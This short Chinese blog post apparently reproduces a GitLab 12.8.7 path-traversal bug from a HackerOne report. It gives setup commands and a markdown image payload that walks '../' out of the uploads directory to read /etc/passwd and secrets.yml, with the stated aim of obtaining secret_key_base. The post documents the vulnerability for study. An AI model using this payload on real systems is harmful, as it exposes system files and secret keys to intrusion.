gitlab漏洞

參考:
https://hackerone.com/reports/827052

受影響版本下載:
https://packages.gitlab.com/gitlab/gitlab-ee/packages/ubuntu/xenial/gitlab-ee_12.8.7-ee.0_amd64.deb

wget --content-disposition https://packages.gitlab.com/gitlab/gitlab-ee/packages/ubuntu/xenial/gitlab-ee_12.8.7-ee.0_amd64.deb/download.deb
sudo dpkg -i 

然後啓動:

sudo gitlab-ctl reconfigure

查看gitlab各個模塊狀態:

sudo gitlab-ctl status

在這裏插入圖片描述

sudo gitlab-ctl tail gitlab-rails

參考:
https://www.iteye.com/blog/hai0378-2366869

Demo

在這裏插入圖片描述
payload:

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)
/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml

拿到secret_key_base
在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章